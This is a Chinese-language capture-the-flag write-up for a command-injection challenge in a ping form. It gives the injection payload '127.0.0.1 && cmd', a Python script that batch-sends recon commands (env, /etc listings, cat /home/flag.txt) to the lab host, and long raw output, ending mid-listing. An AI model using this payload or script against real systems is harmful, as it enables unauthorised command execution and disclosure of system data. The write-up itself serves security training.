【攻防世界】command_execution

news2024/9/22 11:30:18

题目再现

小宁写了个ping功能,但没有写waf,X老师告诉她这是非常危险的,你知道为什么吗。
题目截图

题目分析

本题目说没有写WAF,然后可以执行Linux经典代码PING,我猜测到服务器不会校验我所注入的代码,我利用串行执行符&&进行测试,没想到可以执行Linux代码。

思路分析

既然可以执行远端代码,我便想看看这台服务器中,都存在那些好东西,使用Web浏览器输入命令显然不够方便,我计划使用Python封装一个工具,该工具可以批量的执行我所选中的命令,并批量的输出。理论存在,实践开始。

工具介绍

IDE:Pycharm
辅助工具:Kali Linux

开源代码

import requests
import re


# 以换行符拼接字符串列表
def connectList(list):
    res = list[0].replace('ping -c 3 ', '')
    for i in range(1, len(list)):
        res = res + '\n' + list[i]
    return res


# 执行单条远程命令
def executeCmd(url, cmd):
    html_pre = '''<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>command execution</title>
    <link href="http://libs.baidu.com/bootstrap/3.0.3/css/bootstrap.min.css" rel="stylesheet" />


</head>
<body>

<h1>PING</h1>
<form class="form-inline" method="post">

    <div class="input-group">
        <input style="width:280px;" id="target" type="text" class="form-control" placeholder="请输入需要ping的地址" aria-describedby="basic-addon1" name="target">
    </div>
    <br/>
    <br/>

    <button  style="width:280px;" class="btn btn-default">PING</button>


</form>
<br /><pre>'''
    html_after = '''</pre></body>
</html>'''

    # POST请求的URL和参数
    data = {
        'target': '127.0.0.1 && ' + cmd,
    }

    # 发送POST请求
    response = requests.post(url, data=data)
    response.encoding = 'utf-8'  # 设置解析格式为’UTF-8‘

    # 对返回结果进行处理,删除网页代码,仅仅保留命令执行代码,并分割取出命令执行结果的行
    res = response.text.replace(html_pre, '').replace(html_after, '').split('\n')[0:1] + response.text.replace(html_pre,
                                                                                                               '').replace(
        html_after, '').split('\n')[9:]

    # 处理响应
    if response.status_code == 200:
        print("执行结果:\n", connectList(res))
    else:
        print("POST请求失败,状态码:", response.status_code)


# 执行多条命令
def executeCmds(url, cmds):
    for cmd in cmds:
        executeCmd(url, cmd)


if __name__ == '__main__':
    # 目标地址
    url = "http://61.147.171.105:57982/"

    # 欲执行的命令串,其中包含查看系统名称,目录下文件等信息
    cmds = ['hostname', 'env', 'head -n 1 /etc/issue', 'pwd', 'ls', 'ls -l', 'ls -al', 'ls -al /', 'ls -al /bin',
            'ls -al /etc', 'ls -al /home', 'ls -al /lib', 'ls -al /lib64', 'ls -al /media', 'ls -al /mnt',
            'ls -al /proc',
            'ls -al /run', 'ls -al /sbin', 'ls -al /srv', 'ls -al /sys', 'ls -al /tmp', 'ls -al /usr', 'ls -al /var']
    executeCmds(url, cmds)

    # 欲执行的单个命令
    cmd = 'cat /home/flag.txt'
    executeCmd(url, cmd)

结果说明

以下是执行批量命令的结果:

执行结果:
 127.0.0.1 && hostname
4a98e5039872

执行结果:
 127.0.0.1 && env
APACHE_RUN_DIR=/var/run/apache2
APACHE_PID_FILE=/var/run/apache2/apache2.pid
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
APACHE_LOCK_DIR=/var/lock/apache2
LANG=C
APACHE_RUN_USER=www-data
APACHE_RUN_GROUP=www-data
APACHE_LOG_DIR=/var/log/apache2
PWD=/var/www/html

执行结果:
 127.0.0.1 && head -n 1 /etc/issue
Ubuntu 14.04.5 LTS \n \l

执行结果:
 127.0.0.1 && pwd
/var/www/html

执行结果:
 127.0.0.1 && ls
index.php

执行结果:
 127.0.0.1 && ls -l
total 4
-rw-rw-r-- 1 root root 925 Sep 27  2018 index.php

执行结果:
 127.0.0.1 && ls -al
total 12
drwxr-xr-x 1 root root 4096 Nov 16  2018 .
drwxr-xr-x 1 root root 4096 Nov 16  2018 ..
-rw-rw-r-- 1 root root  925 Sep 27  2018 index.php

执行结果:
 127.0.0.1 && ls -al /
total 88
drwxr-xr-x    1 root root 4096 Aug  9 05:06 .
drwxr-xr-x    1 root root 4096 Aug  9 05:06 ..
-rwxr-xr-x    1 root root    0 Aug  9 05:06 .dockerenv
drwxr-xr-x    2 root root 4096 Mar 20 05:25 .r
drwxr-xr-x    1 root root 4096 Nov 16  2018 bin
drwxr-xr-x    2 root root 4096 Apr 10  2014 boot
drwxr-xr-x    5 root root  360 Aug  9 05:06 dev
drwxr-xr-x    1 root root 4096 Aug  9 05:06 etc
drwxr-xr-x    1 root root 4096 Aug  9 05:06 home
drwxr-xr-x   12 root root 4096 Sep 29  2018 lib
drwxr-xr-x    2 root root 4096 Sep 29  2018 lib64
drwxr-xr-x    2 root root 4096 Sep 29  2018 media
drwxr-xr-x    2 root root 4096 Apr 10  2014 mnt
drwxr-xr-x    2 root root 4096 Sep 29  2018 opt
dr-xr-xr-x 4313 root root    0 Aug  9 05:06 proc
drwx------    2 root root 4096 Sep 29  2018 root
drwxr-xr-x    1 root root 4096 Nov 16  2018 run
-rwxrwxr-x    1 root root   81 Sep 27  2018 run.sh
drwxr-xr-x    1 root root 4096 Oct 19  2018 sbin
drwxr-xr-x    2 root root 4096 Sep 29  2018 srv
dr-xr-xr-x   13 root root    0 Jul  6 06:36 sys
drwxrwxrwt    1 root root 4096 Aug  9 05:06 tmp
drwxr-xr-x    1 root root 4096 Sep 29  2018 usr
drwxr-xr-x    1 root root 4096 Nov 16  2018 var

执行结果:
 127.0.0.1 && ls -al /bin
total 6468
drwxr-xr-x 1 root root    4096 Nov 16  2018 .
drwxr-xr-x 1 root root    4096 Aug  9 05:06 ..
-rwxr-xr-x 1 root root 1021112 May 16  2017 bash
-rwxr-xr-x 3 root root   31152 Oct 21  2013 bunzip2
-rwxr-xr-x 3 root root   31152 Oct 21  2013 bzcat
lrwxrwxrwx 1 root root       6 Oct 21  2013 bzcmp -> bzdiff
-rwxr-xr-x 1 root root    2140 Oct 21  2013 bzdiff
lrwxrwxrwx 1 root root       6 Oct 21  2013 bzegrep -> bzgrep
-rwxr-xr-x 1 root root    4877 Oct 21  2013 bzexe
lrwxrwxrwx 1 root root       6 Oct 21  2013 bzfgrep -> bzgrep
-rwxr-xr-x 1 root root    3642 Oct 21  2013 bzgrep
-rwxr-xr-x 3 root root   31152 Oct 21  2013 bzip2
-rwxr-xr-x 1 root root   14480 Oct 21  2013 bzip2recover
lrwxrwxrwx 1 root root       6 Oct 21  2013 bzless -> bzmore
-rwxr-xr-x 1 root root    1297 Oct 21  2013 bzmore
-rwxr-xr-x 1 root root   47904 Mar 10  2016 cat
-rwxr-xr-x 1 root root   60160 Mar 10  2016 chgrp
-rwxr-xr-x 1 root root   56032 Mar 10  2016 chmod
-rwxr-xr-x 1 root root   60160 Mar 10  2016 chown
-rwxr-xr-x 1 root root   10480 Feb 18  2013 chvt
-rwxr-xr-x 1 root root  130304 Mar 10  2016 cp
-rwxr-xr-x 1 root root  137304 Feb 18  2016 cpio
-rwxr-xr-x 1 root root  121272 Feb 19  2014 dash
-rwxr-xr-x 1 root root   60160 Mar 10  2016 date
-rwxr-xr-x 1 root root   56136 Mar 10  2016 dd
-rwxr-xr-x 1 root root   97768 Mar 10  2016 df
-rwxr-xr-x 1 root root  110080 Mar 10  2016 dir
-rwxr-xr-x 1 root root   22896 Nov 23  2016 dmesg
lrwxrwxrwx 1 root root       8 Dec 13  2013 dnsdomainname -> hostname
lrwxrwxrwx 1 root root       8 Dec 13  2013 domainname -> hostname
-rwxr-xr-x 1 root root   82256 Feb 18  2013 dumpkeys
-rwxr-xr-x 1 root root   31296 Mar 10  2016 echo
-rwxr-xr-x 1 root root  183696 Jan 18  2014 egrep
-rwxr-xr-x 1 root root   27168 Mar 10  2016 false
-rwxr-xr-x 1 root root   10488 Feb 18  2013 fgconsole
-rwxr-xr-x 1 root root  138352 Jan 18  2014 fgrep
-rwxr-xr-x 1 root root   36144 Nov 23  2016 findmnt
-rwxr-xr-x 1 root root   31864 Nov 29  2012 fuser
-rwxr-xr-x 1 root root  191952 Jan 18  2014 grep
-rwxr-xr-x 2 root root    2303 Jan 10  2014 gunzip
-rwxr-xr-x 1 root root    5937 Jan 10  2014 gzexe
-rwxr-xr-x 1 root root   94048 Jan 10  2014 gzip
-rwxr-xr-x 1 root root   14736 Dec 13  2013 hostname
-rwxr-xr-x 1 root root  307328 Dec  6  2017 ip
-rwxr-xr-x 1 root root   10480 Feb 18  2013 kbd_mode
-rwxr-xr-x 1 root root   23088 May 14  2018 kill
-rwxr-xr-x 1 root root  154616 Apr 11  2018 kmod
-rwxr-xr-x 1 root root  153664 Jun 10  2013 less
-rwxr-xr-x 1 root root   10440 Jun 10  2013 lessecho
lrwxrwxrwx 1 root root       8 Jun 10  2013 lessfile -> lesspipe
-rwxr-xr-x 1 root root   15912 Jun 10  2013 lesskey
-rwxr-xr-x 1 root root    7758 Jun 10  2013 lesspipe
-rwxr-xr-x 1 root root   56072 Mar 10  2016 ln
-rwxr-xr-x 1 root root  111432 Feb 18  2013 loadkeys
-rwxr-xr-x 1 root root   49168 May 16  2017 login
-rwxr-xr-x 1 root root  110080 Mar 10  2016 ls
-rwxr-xr-x 1 root root   44688 Nov 23  2016 lsblk
lrwxrwxrwx 1 root root       4 Apr 11  2018 lsmod -> kmod
-rwxr-xr-x 1 root root   51936 Mar 10  2016 mkdir
-rwxr-xr-x 1 root root   35456 Mar 10  2016 mknod
-rwxr-xr-x 1 root root   39648 Mar 10  2016 mktemp
-rwxr-xr-x 1 root root   39600 Nov 23  2016 more
-rwsr-xr-x 1 root root   94792 Nov 23  2016 mount
-rwxr-xr-x 1 root root   10456 Feb 17  2016 mountpoint
lrwxrwxrwx 1 root root      20 Sep 29  2018 mt -> /etc/alternatives/mt
-rwxr-xr-x 1 root root   68760 Feb 18  2016 mt-gnu
-rwxr-xr-x 1 root root  122088 Mar 10  2016 mv
lrwxrwxrwx 1 root root      20 Sep 29  2018 nc -> /etc/alternatives/nc
-rwxr-xr-x 1 root root   31248 Dec  4  2012 nc.openbsd
lrwxrwxrwx 1 root root      24 Sep 29  2018 netcat -> /etc/alternatives/netcat
-rwxr-xr-x 1 root root  119624 Aug  5  2014 netstat
lrwxrwxrwx 1 root root       8 Dec 13  2013 nisdomainname -> hostname
lrwxrwxrwx 1 root root       6 Feb 18  2013 open -> openvt
-rwxr-xr-x 1 root root   18912 Feb 18  2013 openvt
lrwxrwxrwx 1 root root      14 Feb 17  2016 pidof -> /sbin/killall5
-rwsr-xr-x 1 root root   44168 May  7  2014 ping
-rwsr-xr-x 1 root root   44680 May  7  2014 ping6
-rwxr-xr-x 1 root root   35448 May  9  2018 plymouth
-rwxr-xr-x 1 root root   31608 May  9  2018 plymouth-upstart-bridge
-rwxr-xr-x 1 root root   93232 May 14  2018 ps
-rwxr-xr-x 1 root root   31392 Mar 10  2016 pwd
lrwxrwxrwx 1 root root       4 May 16  2017 rbash -> bash
-rwxr-xr-x 1 root root   39528 Mar 10  2016 readlink
-rwxr-xr-x 1 root root   60160 Mar 10  2016 rm
-rwxr-xr-x 1 root root   43648 Mar 10  2016 rmdir
-rwxr-xr-x 1 root root   19248 Aug 28  2013 run-parts
-rwxr-xr-x 1 root root     254 Jul 18  2014 running-in-container
-rwxr-xr-x 1 root root   73352 Feb 13  2014 sed
-rwxr-xr-x 1 root root   39896 Feb 18  2013 setfont
-rwxr-xr-x 1 root root   12052 Jan 29  2014 setupcon
lrwxrwxrwx 1 root root       4 Feb 19  2014 sh -> dash
lrwxrwxrwx 1 root root       4 Feb 19  2014 sh.distrib -> dash
-rwxr-xr-x 1 root root   31296 Mar 10  2016 sleep
-rwxr-xr-x 1 root root   76624 Dec  6  2017 ss
-rwxr-xr-x 1 root root   68256 Mar 10  2016 stty
-rwsr-xr-x 1 root root   36936 May 16  2017 su
-rwxr-xr-x 1 root root   27200 Mar 10  2016 sync
-rwxr-xr-x 1 root root   18816 Nov 23  2016 tailf
-rwxr-xr-x 1 root root  353840 Nov 17  2016 tar
-rwxr-xr-x 1 root root   10344 Aug 28  2013 tempfile
-rwxr-xr-x 1 root root   60224 Mar 10  2016 touch
-rwxr-xr-x 1 root root   27168 Mar 10  2016 true
-rwxr-xr-x 1 root root  248040 Apr 12  2018 udevadm
-rwsr-xr-x 1 root root   69120 Nov 23  2016 umount
-rwxr-xr-x 1 root root   31360 Mar 10  2016 uname
-rwxr-xr-x 2 root root    2303 Jan 10  2014 uncompress
-rwxr-xr-x 1 root root    2762 Feb 18  2013 unicode_start
-rwxr-xr-x 1 root root  110080 Mar 10  2016 vdir
-rwxr-xr-x 1 root root     946 Aug 28  2013 which
-rwxr-xr-x 1 root root   27368 Mar 23  2014 whiptail
lrwxrwxrwx 1 root root       8 Dec 13  2013 ypdomainname -> hostname
-rwxr-xr-x 1 root root    1939 Jan 10  2014 zcat
-rwxr-xr-x 1 root root    1779 Jan 10  2014 zcmp
-rwxr-xr-x 1 root root    5766 Jan 10  2014 zdiff
-rwxr-xr-x 1 root root     142 Jan 10  2014 zegrep
-rwxr-xr-x 1 root root     142 Jan 10  2014 zfgrep
-rwxr-xr-x 1 root root    2133 Jan 10  2014 zforce
-rwxr-xr-x 1 root root    5940 Jan 10  2014 zgrep
-rwxr-xr-x 1 root root    2039 Jan 10  2014 zless
-rwxr-xr-x 1 root root    1912 Jan 10  2014 zmore
-rwxr-xr-x 1 root root    5049 Jan 10  2014 znew

执行结果:
 127.0.0.1 && ls -al /etc
total 560
drwxr-xr-x 1 root root    4096 Aug  9 05:06 .
drwxr-xr-x 1 root root    4096 Aug  9 05:06 ..
-rw------- 1 root root       0 Sep 29  2018 .pwd.lock
drwxr-xr-x 4 root root    4096 Sep 29  2018 X11
-rw-r--r-- 1 root root    2981 Sep 29  2018 adduser.conf
drwxr-xr-x 1 root root    4096 Nov 16  2018 alternatives
drwxr-xr-x 1 root root    4096 Nov 16  2018 apache2
drwxr-xr-x 3 root root    4096 Sep 29  2018 apparmor
drwxr-xr-x 5 root root    4096 Sep 29  2018 apparmor.d
drwxr-xr-x 1 root root    4096 Nov  6  2018 apt
-rw-r--r-- 1 root root    2177 Apr  9  2014 bash.bashrc
drwxr-xr-x 1 root root    4096 Nov 16  2018 bash_completion.d
-rw-r--r-- 1 root root     356 Jan  1  2012 bindresvport.blacklist
-rw-r--r-- 1 root root     321 Apr 16  2014 blkid.conf
lrwxrwxrwx 1 root root      15 Nov 23  2016 blkid.tab -> /dev/.blkid.tab
drwxr-xr-x 2 root root    4096 Sep 29  2018 console-setup
drwxr-xr-x 1 root root    4096 Nov 16  2018 cron.d
drwxr-xr-x 1 root root    4096 Nov 16  2018 cron.daily
drwxr-xr-x 2 root root    4096 Sep 29  2018 cron.hourly
drwxr-xr-x 2 root root    4096 Sep 29  2018 cron.monthly
drwxr-xr-x 2 root root    4096 Sep 29  2018 cron.weekly
-rw-r--r-- 1 root root     722 Feb  9  2013 crontab
drwxr-xr-x 3 root root    4096 Apr 11  2014 dbus-1
-rw-r--r-- 1 root root    2969 Feb 23  2014 debconf.conf
-rw-r--r-- 1 root root      11 Feb 20  2014 debian_version
drwxr-xr-x 1 root root    4096 Nov 16  2018 default
-rw-r--r-- 1 root root     604 Nov  7  2013 deluser.conf
drwxr-xr-x 2 root root    4096 Sep 29  2018 depmod.d
drwxr-xr-x 4 root root    4096 Sep 29  2018 dhcp
drwxr-xr-x 1 root root    4096 Sep 29  2018 dpkg
-rw-r--r-- 1 root root      96 Sep 29  2018 environment
-rw-r--r-- 1 root root      37 Sep 29  2018 fstab
drwxr-xr-x 2 root root    4096 Apr 16  2014 fstab.d
-rw-r--r-- 1 root root    2584 Oct 10  2012 gai.conf
-rw-r--r-- 1 root root     526 Nov 16  2018 group
-rw------- 1 root root     510 Sep 29  2018 group-
-rw-r----- 1 root shadow   439 Nov 16  2018 gshadow
-rw------- 1 root root     426 Sep 29  2018 gshadow-
-rw-r--r-- 1 root root      92 Feb 20  2014 host.conf
-rw-r--r-- 1 root root      13 Aug  9 05:06 hostname
-rw-r--r-- 1 root root     176 Aug  9 05:06 hosts
drwxr-xr-x 2 root root    4096 Sep 29  2018 init
drwxr-xr-x 1 root root    4096 Nov 16  2018 init.d
drwxr-xr-x 5 root root    4096 Sep 29  2018 initramfs-tools
-rw-r--r-- 1 root root    1721 Mar 28  2014 inputrc
drwxr-xr-x 3 root root    4096 May 18  2013 insserv
-rw-r--r-- 1 root root     771 May 18  2013 insserv.conf
drwxr-xr-x 2 root root    4096 May 18  2013 insserv.conf.d
drwxr-xr-x 2 root root    4096 Sep 29  2018 iproute2
-rw-r--r-- 1 root root      26 Aug  1  2016 issue
-rw-r--r-- 1 root root      19 Aug  1  2016 issue.net
drwxr-xr-x 2 root root    4096 Sep 29  2018 kbd
drwxr-xr-x 4 root root    4096 Mar 14  2013 kernel
-rw-r--r-- 1 root root   11179 Nov 16  2018 ld.so.cache
-rw-r--r-- 1 root root      34 Sep 29  2018 ld.so.conf
drwxr-xr-x 2 root root    4096 Sep 29  2018 ld.so.conf.d
drwxr-xr-x 2 root root    4096 Nov 16  2018 ldap
-rw-r--r-- 1 root root     267 Feb 20  2014 legal
-rw-r--r-- 1 root root     191 Dec  4  2013 libaudit.conf
-rw-r--r-- 1 root root    2570 Aug  5  2010 locale.alias
-rw-r--r-- 1 root root     118 Sep 29  2018 localtime
drwxr-xr-x 3 root root    4096 Sep 29  2018 logcheck
-rw-r--r-- 1 root root   10551 Feb 17  2014 login.defs
-rw-r--r-- 1 root root     703 Mar 22  2017 logrotate.conf
drwxr-xr-x 1 root root    4096 Nov 16  2018 logrotate.d
-rw-r--r-- 1 root root     105 Aug  1  2016 lsb-release
-rw-r--r-- 1 root root     111 Jun 13  2018 magic
-rw-r--r-- 1 root root     111 Jun 13  2018 magic.mime
-rw-r--r-- 1 root root    1989 Sep 29  2018 mailcap
-rw-r--r-- 1 root root     449 Jan  6  2015 mailcap.order
-rw-r--r-- 1 root root   23922 Jan  6  2015 mime.types
-rw-r--r-- 1 root root     956 Feb 19  2014 mke2fs.conf
drwxr-xr-x 2 root root    4096 Sep 29  2018 modprobe.d
-rw-r--r-- 1 root root     248 Sep 29  2018 modules
lrwxrwxrwx 1 root root      12 Aug  9 05:06 mtab -> /proc/mounts
drwxr-xr-x 7 root root    4096 Sep 29  2018 network
-rw-r--r-- 1 root root      91 Feb 20  2014 networks
drwxr-xr-x 2 root root    4096 Sep 29  2018 newt
lrwxrwxrwx 1 root root      28 Sep 29  2018 nologin -> /var/lib/initscripts/nologin
-rw-r--r-- 1 root root     475 Feb 20  2014 nsswitch.conf
drwxr-xr-x 2 root root    4096 Sep 29  2018 opt
-rw-r--r-- 1 root root     249 Aug  1  2016 os-release
-rw-r--r-- 1 root root     552 Jan 31  2014 pam.conf
drwxr-xr-x 2 root root    4096 Sep 29  2018 pam.d
-rw-r--r-- 1 root root     956 Sep 29  2018 passwd
drwxr-xr-x 4 root root    4096 Sep 29  2018 perl
drwxr-xr-x 5 root root    4096 Nov 16  2018 php5
drwxr-xr-x 4 root root    4096 Sep 29  2018 ppp
-rw-r--r-- 1 root root     665 Feb 20  2014 profile
drwxr-xr-x 2 root root    4096 Apr 10  2014 profile.d
-rw-r--r-- 1 root root    2932 Dec 30  2013 protocols
drwxr-xr-x 2 root root    4096 Sep 29  2018 python3
drwxr-xr-x 2 root root    4096 Sep 29  2018 python3.4
-rwxr-xr-x 1 root root     306 Sep 29  2018 rc.local
drwxr-xr-x 1 root root    4096 Nov 16  2018 rc0.d
drwxr-xr-x 1 root root    4096 Nov 16  2018 rc1.d
drwxr-xr-x 1 root root    4096 Nov 16  2018 rc2.d
drwxr-xr-x 1 root root    4096 Nov 16  2018 rc3.d
drwxr-xr-x 1 root root    4096 Nov 16  2018 rc4.d
drwxr-xr-x 1 root root    4096 Nov 16  2018 rc5.d
drwxr-xr-x 1 root root    4096 Nov 16  2018 rc6.d
drwxr-xr-x 2 root root    4096 Sep 29  2018 rcS.d
-rw-r--r-- 1 root root     137 Aug  9 05:06 resolv.conf
drwxr-xr-x 4 root root    4096 Sep 29  2018 resolvconf
-rwxr-xr-x 1 root root     268 Feb  4  2014 rmt
-rw-r--r-- 1 root root     887 Dec 30  2013 rpc
-rw-r--r-- 1 root root    1320 Aug 19  2014 rsyslog.conf
drwxr-xr-x 2 root root    4096 Sep 29  2018 rsyslog.d
-rw-r--r-- 1 root root    4038 Feb 17  2014 securetty
drwxr-xr-x 4 root root    4096 Sep 29  2018 security
drwxr-xr-x 2 root root    4096 Sep 29  2018 selinux
-rw-r--r-- 1 root root   19558 Dec 30  2013 services
drwxr-xr-x 2 root root    4096 Nov 16  2018 sgml
-rw-r----- 1 root shadow   532 Sep 29  2018 shadow
-rw-r--r-- 1 root root      73 Sep 29  2018 shells
drwxr-xr-x 2 root root    4096 Sep 29  2018 skel
drwxr-xr-x 4 root root    4096 Nov 16  2018 ssl
-rw-r--r-- 1 root root       0 Sep 29  2018 subgid
-rw------- 1 root root       0 Sep 29  2018 subgid-
-rw-r--r-- 1 root root       0 Sep 29  2018 subuid
-rw------- 1 root root       0 Sep 29  2018 subuid-
-r--r----- 1 root root     755 May 29  2017 sudoers
drwxr-xr-x 2 root root    4096 Sep 29  2018 sudoers.d
-rw-r--r-- 1 root root    2084 Apr  1  2013 sysctl.conf
drwxr-xr-x 2 root root    4096 Sep 29  2018 sysctl.d
drwxr-xr-x 3 root root    4096 Sep 29  2018 systemd
drwxr-xr-x 2 root root    4096 Sep 29  2018 terminfo
-rw-r--r-- 1 root root       8 Sep 29  2018 timezone
-rw-r--r-- 1 root root    1260 Jul  1  2013 ucf.conf
drwxr-xr-x 4 root root    4096 Sep 29  2018 udev
drwxr-xr-x 3 root root    4096 Nov 16  2018 ufw
drwxr-xr-x 2 root root    4096 Sep 29  2018 update-motd.d
-rw-r--r-- 1 root root     222 Apr 11  2014 upstart-xsessions
drwxr-xr-x 2 root root    4096 Sep 29  2018 vim
lrwxrwxrwx 1 root root      23 Sep 29  2018 vtrgb -> /etc/alternatives/vtrgb
drwxr-xr-x 2 root root    4096 Nov 16  2018 xml

执行结果:
 127.0.0.1 && ls -al /home
total 12
drwxr-xr-x 1 root root 4096 Aug  9 05:06 .
drwxr-xr-x 1 root root 4096 Aug  9 05:06 ..
-rw-rw-r-- 1 root root   44 Aug  9 05:06 flag.txt

执行结果:
 127.0.0.1 && ls -al /lib
total 120
drwxr-xr-x 12 root root  4096 Sep 29  2018 .
drwxr-xr-x  1 root root  4096 Aug  9 05:06 ..
drwxr-xr-x  2 root root  4096 Sep 29  2018 ifupdown
drwxr-xr-x  2 root root  4096 Sep 29  2018 init
-rwxr-xr-x  1 root root 71528 Jun 13  2017 klibc-gLiulUM5C1Zpwc25rCxX8UZ6S-s.so
drwxr-xr-x  3 root root  4096 Sep 29  2018 lsb
drwxr-xr-x  2 root root  4096 Apr 10  2014 modprobe.d
drwxr-xr-x  3 root root  4096 Sep 29  2018 plymouth
drwxr-xr-x  2 root root  4096 Sep 29  2018 resolvconf
drwxr-xr-x  3 root root  4096 Sep 29  2018 systemd
drwxr-xr-x 15 root root  4096 Mar 22  2014 terminfo
drwxr-xr-x  4 root root  4096 Sep 29  2018 udev
drwxr-xr-x  4 root root  4096 Sep 29  2018 x86_64-linux-gnu

执行结果:
 127.0.0.1 && ls -al /lib64
total 8
drwxr-xr-x 2 root root 4096 Sep 29  2018 .
drwxr-xr-x 1 root root 4096 Aug  9 05:06 ..
lrwxrwxrwx 1 root root   32 Jan 15  2018 ld-linux-x86-64.so.2 -> /lib/x86_64-linux-gnu/ld-2.19.so

执行结果:
 127.0.0.1 && ls -al /media
total 8
drwxr-xr-x 2 root root 4096 Sep 29  2018 .
drwxr-xr-x 1 root root 4096 Aug  9 05:06 ..

执行结果:
 127.0.0.1 && ls -al /mnt
total 8
drwxr-xr-x 2 root root 4096 Apr 10  2014 .
drwxr-xr-x 1 root root 4096 Aug  9 05:06 ..

执行结果:
 127.0.0.1 && ls -al /proc
total 4
dr-xr-xr-x 4308 root     root        0 Aug  9 05:06 .
drwxr-xr-x    1 root     root     4096 Aug  9 05:06 ..
dr-xr-xr-x    9 root     root        0 Aug  9 05:09 1
dr-xr-xr-x    9 root     root        0 Aug  9 05:09 32
dr-xr-xr-x    9 www-data www-data    0 Aug  9 05:09 35
dr-xr-xr-x    9 www-data www-data    0 Aug  9 05:09 36
dr-xr-xr-x    9 www-data www-data    0 Aug  9 05:09 37
dr-xr-xr-x    9 www-data www-data    0 Aug  9 05:09 38
dr-xr-xr-x    9 www-data www-data    0 Aug  9 05:09 39
dr-xr-xr-x    9 root     root        0 Aug  9 05:09 43
dr-xr-xr-x    9 www-data www-data    0 Aug  9 05:09 50
dr-xr-xr-x    9 www-data www-data    0 Aug  9 05:09 53
dr-xr-xr-x    9 www-data www-data    0 Aug  9 05:09 96
dr-xr-xr-x    9 www-data www-data    0 Aug  9 05:09 98
drwxrwxrwt    2 root     root       40 Aug  9 05:06 acpi
-r--r--r--    1 root     root        0 Aug  9 05:09 buddyinfo
dr-xr-xr-x    4 root     root        0 Aug  9 05:06 bus
-r--r--r--    1 root     root        0 Aug  9 05:09 cgroups
-r--r--r--    1 root     root        0 Aug  9 05:09 cmdline
-r--r--r--    1 root     root        0 Aug  9 05:09 consoles
-r--r--r--    1 root     root        0 Aug  9 05:09 cpuinfo
-r--r--r--    1 root     root        0 Aug  9 05:09 crypto
-r--r--r--    1 root     root        0 Aug  9 05:09 devices
-r--r--r--    1 root     root        0 Aug  9 05:09 diskstats
-r--r--r--    1 root     root        0 Aug  9 05:09 dma
dr-xr-xr-x    2 root     root        0 Aug  9 05:09 driver
-r--r--r--    1 root     root        0 Aug  9 05:09 execdomains
-r--r--r--    1 root     root        0 Aug  9 05:09 fb
-r--r--r--    1 root     root        0 Aug  9 05:09 filesystems
dr-xr-xr-x    6 root     root        0 Aug  9 05:06 fs
-r--r--r--    1 root     root        0 Aug  9 05:09 interrupts
-r--r--r--    1 root     root        0 Aug  9 05:09 iomem
-r--r--r--    1 root     root        0 Aug  9 05:09 ioports
dr-xr-xr-x   66 root     root        0 Aug  9 05:06 irq
-r--r--r--    1 root     root        0 Aug  9 05:09 kallsyms
crw-rw-rw-    1 root     root     1, 3 Aug  9 05:06 kcore
-r--r--r--    1 root     root        0 Aug  9 05:09 key-users
crw-rw-rw-    1 root     root     1, 3 Aug  9 05:06 keys
-r--------    1 root     root        0 Aug  9 05:09 kmsg
-r--------    1 root     root        0 Aug  9 05:09 kpagecgroup
-r--------    1 root     root        0 Aug  9 05:09 kpagecount
-r--------    1 root     root        0 Aug  9 05:09 kpageflags
-r--r--r--    1 root     root        0 Aug  9 05:09 loadavg
-r--r--r--    1 root     root        0 Aug  9 05:09 locks
-r--r--r--    1 root     root        0 Aug  9 05:09 mdstat
-r--r--r--    1 root     root        0 Aug  9 05:09 meminfo
-r--r--r--    1 root     root        0 Aug  9 05:09 misc
-r--r--r--    1 root     root        0 Aug  9 05:09 modules
lrwxrwxrwx    1 root     root       11 Aug  9 05:09 mounts -> self/mounts
dr-xr-xr-x    3 root     root        0 Aug  9 05:09 mpt
-rw-r--r--    1 root     root        0 Aug  9 05:09 mtrr
lrwxrwxrwx    1 root     root        8 Aug  9 05:09 net -> self/net
-r--r--r--    1 root     root        0 Aug  9 05:09 pagetypeinfo
-r--r--r--    1 root     root        0 Aug  9 05:09 partitions
crw-rw-rw-    1 root     root     1, 3 Aug  9 05:06 sched_debug
-r--r--r--    1 root     root        0 Aug  9 05:09 schedstat
drwxrwxrwt    2 root     root       40 Aug  9 05:06 scsi
lrwxrwxrwx    1 root     root        0 Aug  9 05:06 self -> 98
-r--------    1 root     root        0 Aug  9 05:09 slabinfo
-r--r--r--    1 root     root        0 Aug  9 05:09 softirqs
-r--r--r--    1 root     root        0 Aug  9 05:09 stat
-r--r--r--    1 root     root        0 Aug  9 05:09 swaps
dr-xr-xr-x    1 root     root        0 Aug  9 05:06 sys
--w-------    1 root     root        0 Aug  9 05:06 sysrq-trigger
dr-xr-xr-x    2 root     root        0 Aug  9 05:09 sysvipc
lrwxrwxrwx    1 root     root        0 Aug  9 05:06 thread-self -> 98/task/98
crw-rw-rw-    1 root     root     1, 3 Aug  9 05:06 timer_list
dr-xr-xr-x    4 root     root        0 Aug  9 05:09 tty
-r--r--r--    1 root     root        0 Aug  9 05:09 uptime
-r--r--r--    1 root     root        0 Aug  9 05:09 version
-r--r--r--    1 root     root        0 Aug  9 05:09 version_signature
-r--------    1 root     root        0 Aug  9 05:09 vmallocinfo
-r--r--r--    1 root     root        0 Aug  9 05:09 vmstat
-r--r--r--    1 root     root        0 Aug  9 05:09 zoneinfo

执行结果:
 127.0.0.1 && ls -al /run
total 48
drwxr-xr-x 1 root root   4096 Nov 16  2018 .
drwxr-xr-x 1 root root   4096 Aug  9 05:06 ..
drwxr-xr-x 1 root root   4096 Aug  9 05:06 apache2
drwxrwxrwt 1 root root   4096 Nov 16  2018 lock
-rw-r--r-- 1 root root    110 Sep 29  2018 motd.dynamic
drwxr-xr-x 2 root netdev 4096 Sep 29  2018 network
drwxr-xr-x 3 root root   4096 Sep 29  2018 resolvconf
drwxr-xr-x 2 root root   4096 Sep 29  2018 sendsigs.omit.d
drwxr-xr-x 2 root root   4096 Sep 29  2018 shm
drwxr-xr-x 2 root root   4096 Oct 19  2018 systemd
-rw-rw-r-- 1 root utmp      0 Sep 29  2018 utmp

执行结果:
 127.0.0.1 && ls -al /sbin
total 6952
drwxr-xr-x 1 root root      4096 Oct 19  2018 .
drwxr-xr-x 1 root root      4096 Aug  9 05:06 ..
-rwxr-xr-x 1 root root     52466 Mar 27  2017 MAKEDEV
-rwxr-xr-x 2 root root     32112 Nov 23  2016 agetty
-rwxr-xr-x 1 root root     27160 Sep  9  2015 badblocks
